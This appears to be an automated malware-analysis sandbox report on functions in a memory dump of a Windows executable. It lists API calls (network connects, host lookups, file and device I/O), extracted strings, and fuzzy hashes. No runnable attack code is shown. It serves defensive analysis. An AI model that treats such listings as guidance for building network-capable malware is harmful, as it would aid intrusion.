Instruction Fuzzy Hash: B3519371C05258DEDB50DBA9D941BEDBBB4EF55300F2081AEE508F7282EB781A44CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00418804, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 320networkCOMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00418808

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

__EH_prolog.LIBCMT ref: 00418813
gethostbyname.WS2_32(?), ref: 0041884A
htons.WS2_32(00000000), ref: 00418980
connect.WS2_32(00000000,?,00000010), ref: 00418A4E
closesocket.WS2_32(00000000), ref: 00418B60

Part of subcall function 0041D156: __Thrd_sleep.LIBCPMT ref: 0041D1E9

Strings

GET /, xrefs: 0041898A
M, xrefs: 00418896
d, xrefs: 00418C38

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ExceptionException@8H_prologRaiseThrd_sleepThrowclosesocketconnectgethostbynamehtons
String ID: GET /$M$d
API String ID: 2952866059-1107666099
Opcode ID: bbd3e12831496e929c62580de9ed87382cef6fd76aefc83fe1bbc7c55bbd025f
Instruction ID: 9b7baaba5424cb5545f40191429bc043d98c3edb0c514d8ee0c770f26a5fa6fa
Opcode Fuzzy Hash: bbd3e12831496e929c62580de9ed87382cef6fd76aefc83fe1bbc7c55bbd025f
Instruction Fuzzy Hash: 25D1E07190064CDEEB01DFA8D841AEDBBB8FF19304F10826EF505A71A1EB785A85CB59

Uniqueness

Uniqueness Score: -1.00%

Function 006A2E68, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,006A57E6,00422E80), ref: 006A2E8B

Strings

log10, xrefs: 006A2ED5, 006A2F25
asin, xrefs: 006A2FF7
0A, xrefs: 006A2F01, 006A2F9B, 006A3053
log, xrefs: 006A2F31, 006A2F3D
pow, xrefs: 006A2F6F, 006A301B, 006A302E
acos, xrefs: 006A3003
sqrt, xrefs: 006A300F
exp, xrefs: 006A2F50, 006A2FB2

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: DecodePointer
String ID: 0A$acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3000281093
Opcode ID: dc475536c57bb4284f6654862b2378a91c74b386d517da7b3eef608dfe3f0401
Instruction ID: 6f7b7f455ecb60374e68c74d5cc54e10efa06fe8d286a3d359277e8a127d8e40
Opcode Fuzzy Hash: dc475536c57bb4284f6654862b2378a91c74b386d517da7b3eef608dfe3f0401
Instruction Fuzzy Hash: 6F515BB094451ACBCF10AF6CDA585EDBBB6FF4A300F204199E481A6368CB758E65CF18

Uniqueness

Uniqueness Score: -1.00%

Function 00414D11, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00414D16
VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,?,00000000,00000000), ref: 00414D99
VerifyVersionInfoW.KERNEL32(?,00000002,00000000), ref: 00414DAA
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,?,00000000,00000000), ref: 00414E00
GetLastError.KERNEL32(?,?,00000000,00000000), ref: 00414E0D

Part of subcall function 0041046E: __EH_prolog.LIBCMT ref: 00410473

new.LIBCMT ref: 00414E4B
new.LIBCMT ref: 00414E64

Strings

IA, xrefs: 00414D2D
iocp, xrefs: 00414E27

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$CompletionConditionCreateErrorInfoLastMaskPortVerifyVersion
String ID: iocp$IA
API String ID: 1196141489-1642127137
Opcode ID: b0f3246ead77c7689afcd01ab0d67d730d4016a9fd52e566d56f7d59da4e6cbc
Instruction ID: 038c8f07e64acd417a65f5bc7aef818a56c2b5239a28710b74be9449e2c5509c
Opcode Fuzzy Hash: b0f3246ead77c7689afcd01ab0d67d730d4016a9fd52e566d56f7d59da4e6cbc
Instruction Fuzzy Hash: D7517BB0901244DFDB14DF69C88579EBFF4AF55310F1081AEE858AB382C7B88A44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00414884, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00414889
std::exception::exception.LIBCONCRT ref: 004148A9

Part of subcall function 0040F331: ___std_exception_copy.LIBVCRUNTIME ref: 0040F358

Part of subcall function 0041CD28: __EH_prolog.LIBCMT ref: 0041CD2D
Part of subcall function 0041CD28: __CxxThrowException@8.LIBVCRUNTIME ref: 0041CD7B

EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000064,00000000,00000001), ref: 004148DA
LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,00000064,00000000), ref: 00414922
std::exception::exception.LIBCONCRT ref: 00414943

Strings

Invalid service owner., xrefs: 004148A1
>A, xrefs: 00414957
>A, xrefs: 004148C0
Service already exists., xrefs: 0041493B

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalH_prologSectionstd::exception::exception$EnterException@8LeaveThrow___std_exception_copy
String ID: Invalid service owner.$Service already exists.$>A$>A
API String ID: 479834926-2055121031
Opcode ID: ef6a05605f391c6dce385709d7bea56575594f655a0a972a661ad9726dfa3e86
Instruction ID: 1912cb68cf49eb22a32907775ec93aacb183c84b1b81127304af0ca5568ca7ef
Opcode Fuzzy Hash: ef6a05605f391c6dce385709d7bea56575594f655a0a972a661ad9726dfa3e86
Instruction Fuzzy Hash: 7C217E70901608DFCB10DF64C9856DEBBF0FF15314F2481AED8456B282D775AE49CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004153BC, Relevance: 15.2, APIs: 10, Instructions: 242COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004153C1
EnterCriticalSection.KERNEL32(?,00000000,?,00000000), ref: 004153EA
LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 0041544C
SetLastError.KERNEL32(00000000,00000000,?,00000000), ref: 0041545E
GetQueuedCompletionStatus.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415476
GetLastError.KERNEL32(?,00000000), ref: 0041547F
__ExceptionPtrCopy.LIBCPMT ref: 0041553B
__ExceptionPtrCopy.LIBCPMT ref: 0041554C
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 004155CB
GetLastError.KERNEL32(?,00000000), ref: 004155D5

Part of subcall function 004152B4: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000), ref: 004152DB
Part of subcall function 004152B4: GetLastError.KERNEL32 ref: 004152E5

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLast$CompletionQueuedStatus$CopyCriticalExceptionPostSection$EnterH_prologLeave
String ID:
API String ID: 4011970719-0
Opcode ID: 3cf5315401eb3d5143f399373043416beba5d93d4323d1337df3a1362f0f602d
Instruction ID: 7290affd22a57e4542e8205bc75613427f0ee98cdde122a9be2dcbcb5fb5e355
Opcode Fuzzy Hash: 3cf5315401eb3d5143f399373043416beba5d93d4323d1337df3a1362f0f602d
Instruction Fuzzy Hash: 4E918AB1D01219DFCF15DFA8C844AEEBBB9FF88310B14416AE815EB201D7389985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00428862, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 249COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00428867
new.LIBCMT ref: 00428885

Part of subcall function 0049E34F: __EH_prolog.LIBCMT ref: 0049E354

Part of subcall function 004AB0A0: __EH_prolog.LIBCMT ref: 004AB0A5
Part of subcall function 004AB0A0: std::exception::exception.LIBCONCRT ref: 004AB164
Part of subcall function 004AB0A0: __CxxThrowException@8.LIBVCRUNTIME ref: 004AB191

Part of subcall function 0049E4CA: __EH_prolog.LIBCMT ref: 0049E4CF
Part of subcall function 0049E4CA: new.LIBCMT ref: 0049E51C

Part of subcall function 0049E81D: __EH_prolog.LIBCMT ref: 0049E822

_strlen.LIBCMT ref: 00428A02

Part of subcall function 0045D4EA: __EH_prolog.LIBCMT ref: 0045D4EF

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

Strings

}]}}, xrefs: 00428A47
{"xml":{"block":{, xrefs: 00428ACA
}}}, xrefs: 004289F9, 00428A0A, 00428A29, 00428A5D
{"xml":{"block":[{, xrefs: 00428AB4
allocator_, xrefs: 004288E5

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$DeallocateException@8Throw_strlenstd::_std::exception::exception
String ID: allocator_${"xml":{"block":[{${"xml":{"block":{$}]}}$}}}
API String ID: 1519558710-3049038541
Opcode ID: a55d571a16b4940b880071a245217445f5d4f1c18ecb530b70261cd948a2b9a7
Instruction ID: ab97b9e7ba85fb5d1002f0125655c064219a554ddf5e7334edceca5d4e444bae
Opcode Fuzzy Hash: a55d571a16b4940b880071a245217445f5d4f1c18ecb530b70261cd948a2b9a7
Instruction Fuzzy Hash: 77A1D471D01248EFEF15EBA9D946BEDBBB0AF15304F50409EE40577282EB781B48CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00544DE6, Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 183COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00544DEB
_strlen.LIBCMT ref: 00544EA8

Part of subcall function 0051E077: __EH_prolog.LIBCMT ref: 0051E07C

Strings

(, xrefs: 00544E03
Type name should contain only letters, digits, - and _, xrefs: 00544F47
Invalid type info, xrefs: 0054501B
Some of required function pointers (is_instance, release, read or write) are NULL, xrefs: 00544FC1
cvRegisterType, xrefs: 00544E5F, 00544F36, 00544FB0, 0054500A
Type name should start with a letter or _, xrefs: 00544E70

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$_strlen
String ID: ($Invalid type info$Some of required function pointers (is_instance, release, read or write) are NULL$Type name should contain only letters, digits, - and _$Type name should start with a letter or _$cvRegisterType
API String ID: 1490583215-3333454738
Opcode ID: 1a1a06d2a949fc44be661034546e8647bdf91370f536eee8b74e7d6b55221729
Instruction ID: 4b19a72476af100ce37b93e65ba1c3599d3effa8552718779b56a150e5f9e92f
Opcode Fuzzy Hash: 1a1a06d2a949fc44be661034546e8647bdf91370f536eee8b74e7d6b55221729
Instruction Fuzzy Hash: F061F371C4434CEADB24EF94C945BEEBBB8BF14304F60415EE501A7292EB745B4ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 005C7030, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

Part of subcall function 0042662F: __EH_prolog.LIBCMT ref: 00426634

Part of subcall function 005C6650: CreateFileW.KERNEL32(00000000,00000007,00000007,00000007,00000007,00000007,00000007), ref: 005C6672

GetLastError.KERNEL32(00000000,?,?,?,2ECD3809,?,00000000,00000000), ref: 005C70BD
new.LIBCMT ref: 005C70F4
DeviceIoControl.KERNEL32 ref: 005C712E
GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,2ECD3809,?,00000000,00000000), ref: 005C7138

Strings

boost::filesystem::read_symlink, xrefs: 005C70CA, 005C7142
da\, xrefs: 005C70FC, 005C7114, 005C71BB, 005C7156
da\, xrefs: 005C70C7, 005C70CF, 005C7147, 005C7175
Unknown ReparseTag in boost::filesystem::read_symlink, xrefs: 005C7170

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLast$ControlCreateDeviceFileH_prolog
String ID: Unknown ReparseTag in boost::filesystem::read_symlink$boost::filesystem::read_symlink$da\$da\
API String ID: 1553520704-2146718076
Opcode ID: 0898e0dd01fb22b3febdfcaf7afacfae8ba6a13ba5ea08bb0a01785536a12325
Instruction ID: d2d9be2689bac63acf4830bc6876970ce1b9c329a119ab01c08524181d89f15f
Opcode Fuzzy Hash: 0898e0dd01fb22b3febdfcaf7afacfae8ba6a13ba5ea08bb0a01785536a12325
Instruction Fuzzy Hash: B751D171904209AEDB14EBD0DC46FBEBB79FB54714F50005DF912A71C2EB78AA04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00416578, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 103libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041657D
GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 004165B3
GetProcAddress.KERNEL32(00000000), ref: 004165BA
GetLastError.KERNEL32 ref: 004165CF
EnterCriticalSection.KERNEL32(00000018,0000273D), ref: 0041664B
LeaveCriticalSection.KERNEL32(00000018,?,?,000003E3), ref: 00416679

Strings

KERNEL32, xrefs: 004165AE
CancelIoEx, xrefs: 004165A9

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalSection$AddressEnterErrorH_prologHandleLastLeaveModuleProc
String ID: CancelIoEx$KERNEL32
API String ID: 3905279128-434325024
Opcode ID: a71ac3f215ce180a89ae34b43675de2005a6eaff6a76780a42a51a26d670a940
Instruction ID: 6d50c487a22238e8c2160ca6c9a4e672368bc2a2d5f1676de36c5eed0a259208
Opcode Fuzzy Hash: a71ac3f215ce180a89ae34b43675de2005a6eaff6a76780a42a51a26d670a940
Instruction Fuzzy Hash: DA31B171900219EFCF00DF69C8449EEBBB5BF48314F05412EE855A7280CB78D941CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0049F910, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0049F915
std::locale::_Init.LIBCPMT ref: 0049F92D

Part of subcall function 0057BBA4: __EH_prolog3.LIBCMT ref: 0057BBAB
Part of subcall function 0057BBA4: std::_Lockit::_Lockit.LIBCPMT ref: 0057BBB6
Part of subcall function 0057BBA4: std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 0057BBC9
Part of subcall function 0057BBA4: std::locale::_Setgloballocale.LIBCPMT ref: 0057BBD1
Part of subcall function 0057BBA4: _Yarn.LIBCPMT ref: 0057BBE7
Part of subcall function 0057BBA4: std::_Lockit::~_Lockit.LIBCPMT ref: 0057BC25

new.LIBCMT ref: 0049F968

Part of subcall function 004218B2: __EH_prolog.LIBCMT ref: 004218B7
Part of subcall function 004218B2: __Getcvt.LIBCPMT ref: 004218EE

std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 0049F99C

Part of subcall function 0057BD14: __EH_prolog3.LIBCMT ref: 0057BD1B
Part of subcall function 0057BD14: new.LIBCMT ref: 0057BD22
Part of subcall function 0057BD14: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0057BD39

Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503

std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0049F9B4

Part of subcall function 0057B602: __EH_prolog3.LIBCMT ref: 0057B609
Part of subcall function 0057B602: std::_Lockit::_Lockit.LIBCPMT ref: 0057B613
Part of subcall function 0057B602: Concurrency::cancel_current_task.LIBCPMT ref: 0057B646
Part of subcall function 0057B602: std::_Lockit::~_Lockit.LIBCPMT ref: 0057B6B9

_Yarn.LIBCPMT ref: 0049F9C8

Strings

H4J, xrefs: 0049F927
j4J, xrefs: 0049F986

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Lockitstd::_std::locale::_$Locimp::_$H_prologH_prolog3LocimpLockit::_Lockit::~_$New_Yarn$AddfacConcurrency::cancel_current_taskGetcvtInitLocimp_Setgloballocale
String ID: H4J$j4J
API String ID: 934797631-538168533
Opcode ID: 3ac620f0f7660ecd6cc58cf6cd58e0ab0f42ee8c4f1e8507d66c796f7baf1e44
Instruction ID: b983045c751d55addd12a40cf139ccbd6cb917d7d65721fea23db6559486fc10
Opcode Fuzzy Hash: 3ac620f0f7660ecd6cc58cf6cd58e0ab0f42ee8c4f1e8507d66c796f7baf1e44
Instruction Fuzzy Hash: 6E31F470905284DBEF14EF68D48579DBFF4EF14304F10819EE4089B283D7B84A04CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0041AAF2, Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 221COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0041AAF6

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

__EH_prolog.LIBCMT ref: 0041AB01

Part of subcall function 00478772: __EH_prolog.LIBCMT ref: 00478777
Part of subcall function 00478772: GetModuleHandleA.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 00478826
Part of subcall function 00478772: GetProcAddress.KERNEL32(00000000,?,?,00000000,00000000), ref: 0047882D

Part of subcall function 00414332: std::_Throw_Cpp_error.LIBCPMT ref: 0041433D

Strings

a|B, xrefs: 0041ABA4
|, xrefs: 0041AB86
B, xrefs: 0041AB8D
a|B, xrefs: 0041AD8A, 0041ACDB, 0041ACDE
r, xrefs: 0041AC00

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$AddressCpp_errorExceptionException@8HandleModuleProcRaiseThrowThrow_std::_
String ID: B$a|B$a|B$r$|
API String ID: 3644655947-2592681986
Opcode ID: 52a61f831b0cfa54a01e69ab78b763b09945d5f16a6b3e8a95b19aeea9a9c3a5
Instruction ID: b1051e582c7afd316f5a55349c15d545ebf5893fbf8750c5ac2e665e29032e3a
Opcode Fuzzy Hash: 52a61f831b0cfa54a01e69ab78b763b09945d5f16a6b3e8a95b19aeea9a9c3a5
Instruction Fuzzy Hash: 0D81C371D0424CAEDB04DFE9D841BEDBBB8AF14304F20822FF515A7191EB785A85CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004B4664, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 116COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004B4669
std::exception::exception.LIBCONCRT ref: 004B4750
__CxxThrowException@8.LIBVCRUNTIME ref: 004B477D
std::exception::exception.LIBCONCRT ref: 004B47A4

Part of subcall function 0040F331: ___std_exception_copy.LIBVCRUNTIME ref: 0040F358

Strings

expected >, xrefs: 004B4748
]sB, xrefs: 004B4766
unexpected end of data, xrefs: 004B479F

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::exception::exception$Exception@8H_prologThrow___std_exception_copy
String ID: ]sB$expected >$unexpected end of data
API String ID: 4209301069-901249175
Opcode ID: 598e27828e8df34971bd97bc27fd9d6a69d74b7023616a4b54635af4391f879d
Instruction ID: da855da76143e28ba7433a8049fd60b6928f193c4c67aaf5b560c218fc8497c2
Opcode Fuzzy Hash: 598e27828e8df34971bd97bc27fd9d6a69d74b7023616a4b54635af4391f879d
Instruction Fuzzy Hash: FC41AE709042459FCB10DF69C1546ADBBF4EF5A314F2480AEE895AB342C7799E02CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004195D1, Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 452networkCOMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004195D5

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

__EH_prolog.LIBCMT ref: 004195E0
gethostbyname.WS2_32(?), ref: 0041961B

Part of subcall function 00415811: __EH_prolog.LIBCMT ref: 00415816
Part of subcall function 00415811: new.LIBCMT ref: 00415828
Part of subcall function 00415811: new.LIBCMT ref: 00415866

Part of subcall function 00416FC2: htons.WS2_32(?), ref: 00416FFA
Part of subcall function 00416FC2: htonl.WS2_32(00000000), ref: 00417011
Part of subcall function 00416FC2: htonl.WS2_32(00000000), ref: 00417018

Strings

q, xrefs: 0041984A
Q, xrefs: 00419AA5
<, xrefs: 00419AAC

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prologhtonl$ExceptionException@8RaiseThrowgethostbynamehtons
String ID: <$Q$q
API String ID: 2841390951-909606520
Opcode ID: 40cb31407b016a65b7334fbf232e7698aa05a86ba7ea5de91c3b56d0f646c1c7
Instruction ID: f70e34699a2ffa5ce388f824ed4b99f1f730ff4a9cab42418cb218840e06cff6
Opcode Fuzzy Hash: 40cb31407b016a65b7334fbf232e7698aa05a86ba7ea5de91c3b56d0f646c1c7
Instruction Fuzzy Hash: 4502907180025CEADB15DFA8DC51BEEB7B8BF15304F1041AEE505A7191EB786F88CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00419130, Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 323networkCOMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00419134

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

__EH_prolog.LIBCMT ref: 0041913F
gethostbyname.WS2_32(?), ref: 00419173
_strlen.LIBCMT ref: 00419288

Part of subcall function 0041D1F6: __EH_prolog.LIBCMT ref: 0041D1FB

Part of subcall function 0041D156: __Thrd_sleep.LIBCPMT ref: 0041D1E9

Part of subcall function 0041D156: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D1BB

Part of subcall function 00416578: __EH_prolog.LIBCMT ref: 0041657D

Strings

., xrefs: 004191BC
b, xrefs: 0041932F

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$ExceptionException@8RaiseThrd_sleepThrowUnothrow_t@std@@@__ehfuncinfo$??2@_strlengethostbyname
String ID: .$b
API String ID: 3595494107-2680574762
Opcode ID: 307ecce9dd96dbe35c47104df2e955f5361acf14e0693878b00d9204af6f95f8
Instruction ID: 99e4a221101cd6e4a68c917da74a03fb218fcc0a0d34ab36574a5b4331b5d08c
Opcode Fuzzy Hash: 307ecce9dd96dbe35c47104df2e955f5361acf14e0693878b00d9204af6f95f8
Instruction Fuzzy Hash: 16D1B27180425CEEDB15EBA4DC85BEEB7B8FF14304F1041AEE509A6091EB785F88CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00419F46, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 222COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00419F4A

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

__EH_prolog.LIBCMT ref: 00419F55

Part of subcall function 00478772: __EH_prolog.LIBCMT ref: 00478777
Part of subcall function 00478772: GetModuleHandleA.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 00478826
Part of subcall function 00478772: GetProcAddress.KERNEL32(00000000,?,?,00000000,00000000), ref: 0047882D

Part of subcall function 00414332: std::_Throw_Cpp_error.LIBCPMT ref: 0041433D

Strings

>h*, xrefs: 00419FF8
*, xrefs: 00419FE1
h, xrefs: 00419FDA
>h*, xrefs: 0041A1DE, 0041A12F, 0041A132

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$AddressCpp_errorExceptionException@8HandleModuleProcRaiseThrowThrow_std::_
String ID: *$>h*$>h*$h
API String ID: 3644655947-1020745304
Opcode ID: eef09e8c831d59c9fa3d475a68f086b3ceddfa80296325435617df3a04700a9b
Instruction ID: beda1442bfbc1e0e34ad2bd689beb1eec137509d923f5cd1e4098c00382aefd6
Opcode Fuzzy Hash: eef09e8c831d59c9fa3d475a68f086b3ceddfa80296325435617df3a04700a9b
Instruction Fuzzy Hash: 1B81C37190024CAEDB04DFE9D841BEDBBB8EF18304F20826FF515A7191EB785A85CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0049F6A5, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 178COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0049F6AA
std::exception::exception.LIBCONCRT ref: 0049F84F
__CxxThrowException@8.LIBVCRUNTIME ref: 0049F877
std::exception::exception.LIBCONCRT ref: 0049F898

Strings

bad conversion, xrefs: 0049F847, 0049F890
>A, xrefs: 0049F863

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::exception::exception$Exception@8H_prologThrow
String ID: bad conversion$>A
API String ID: 1448338827-413851156
Opcode ID: c6cef2b60406f02a06de6a4db0cd0602f05231c783af40256a6adc0ba75168cf
Instruction ID: ed9149be649446b85251c730fe4e238d0b5628cbffe1d46de8d989f479908c9e
Opcode Fuzzy Hash: c6cef2b60406f02a06de6a4db0cd0602f05231c783af40256a6adc0ba75168cf
Instruction Fuzzy Hash: 796127B1900248EFDF10DFA9C885AEEBFB4BF18308F14446EE545E7242D774AA49CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0069F206, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32 ref: 0069F248
__fassign.LIBCMT ref: 0069F2C3
__fassign.LIBCMT ref: 0069F2DE
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 0069F304
WriteFile.KERNEL32(?,00000000,00000000,0069F97B,00000000), ref: 0069F323
WriteFile.KERNEL32(?,00000003,00000001,0069F97B,00000000), ref: 0069F35C

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 0bff8264e004f373d5ec92f976c96b9fb7d22514e0c740fe49b3edd32826fa52
Instruction ID: 38a0491873d40675f241dda7afe992ea42844f7661563bf7f20e06f30d2a6d26
Opcode Fuzzy Hash: 0bff8264e004f373d5ec92f976c96b9fb7d22514e0c740fe49b3edd32826fa52
Instruction Fuzzy Hash: 5451A2719002099FDF10CFA8DC45AEEBBFAEF09310F15816AE551E7651E734D941CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004AB0A0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 91COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004AB0A5
std::exception::exception.LIBCONCRT ref: 004AB164
__CxxThrowException@8.LIBVCRUNTIME ref: 004AB191

Strings

text, xrefs: 004AB0C3
]sB, xrefs: 004AB17A
expected <, xrefs: 004AB15C

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Exception@8H_prologThrowstd::exception::exception
String ID: ]sB$expected <$text
API String ID: 1340123063-2654176306
Opcode ID: 634ac965015f2931497bd25128e59a060a8e6af0b7036ca5ebd2cf5bc5686785
Instruction ID: 78cb5fb5e912ca49d5a2d2385afa47c100d33730436c0ef76d036eb01693bc97
Opcode Fuzzy Hash: 634ac965015f2931497bd25128e59a060a8e6af0b7036ca5ebd2cf5bc5686785
Instruction Fuzzy Hash: 6C31C771E003099BDB10DF69C4506AABBB4FF263A0F04826FE8949B783D378D9418BC4

Uniqueness

Uniqueness Score: -1.00%

Function 00696A20, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F4,?,?), ref: 00696A40
GetFileType.KERNEL32 ref: 00696A52
swprintf.LIBCMT ref: 00696A73
WriteConsoleW.KERNEL32 ref: 00696AB0
_abort.LIBCMT ref: 00696ACB

Strings

Assertion failed: %Ts, file %Ts, line %d, xrefs: 00696A68

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ConsoleFileHandleTypeWrite_abortswprintf
String ID: Assertion failed: %Ts, file %Ts, line %d
API String ID: 2465388337-1719349581
Opcode ID: f76e312c8cdb94d20c803e1ff69e5230eaf54aa276ebda209e078d1a651b8dc4
Instruction ID: 7b4362013b528318d88b3fa74f026294002c6185fa33420ff9a6dd92d098de14
Opcode Fuzzy Hash: f76e312c8cdb94d20c803e1ff69e5230eaf54aa276ebda209e078d1a651b8dc4
Instruction Fuzzy Hash: 28112B719012186BCF20DB28CC45DEFB7BEEF45310F50865AFE16A7681EA309E468B54

Uniqueness

Uniqueness Score: -1.00%

